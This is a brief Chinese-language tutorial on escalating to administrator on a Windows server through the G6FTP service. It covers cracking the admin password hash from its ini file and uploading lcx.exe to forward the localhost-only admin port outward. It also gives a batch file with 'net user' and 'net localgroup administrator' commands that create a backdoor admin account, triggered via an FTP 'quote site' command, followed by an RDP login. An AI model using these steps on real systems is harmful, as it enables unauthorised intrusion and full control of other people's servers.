15、第三方软件提权:g6ftp提权
1、下载管理配置文件,将administrator管理密码**,利用md5解密。
找到g6ftp目录下的renoteadmin目录,编辑renote.ini文件,用md5解密password
cmd5.com
我们安装完g6ftp的时候先别启动,需要先结束g6ftpserver进程,随后利用工具进行**:
将该压缩包解压到g6ftp的安装目录,替换文件即可。
2、使用lcx端口转发(默认只允许本机连接),g6ftp默认只监听127.0.0.1 8021端口,用户在外网访问不了g6ftp外网8021端口,g6ftp只监听服务器127.0.0.1 8021端口,需要将8021转发成8027端口,将8027监听在服务器的所有地方上,这时候我们就可以在外网访问服务器外网的8027端口就相对于访问8021端口。
我们要先上传lcx.exe和cmd.exe到服务器上的可读可写目录下。
cmd来到lcx目录:lcx.exe -tran 8027 127.0.0.1 8021
3、使用客户端以管理员用户登录
4、创建用户并设置权限:
创建执行的批处理文件:xx.bat
net user lala 123 /add
net localgroup administrator lala /add
上传批处理
5、用已创建的普通用户登录ftp
6、执行命令 quote site adduser【上面我们添加的命令】
7、接着用批处理创建的用户来连接3389即可。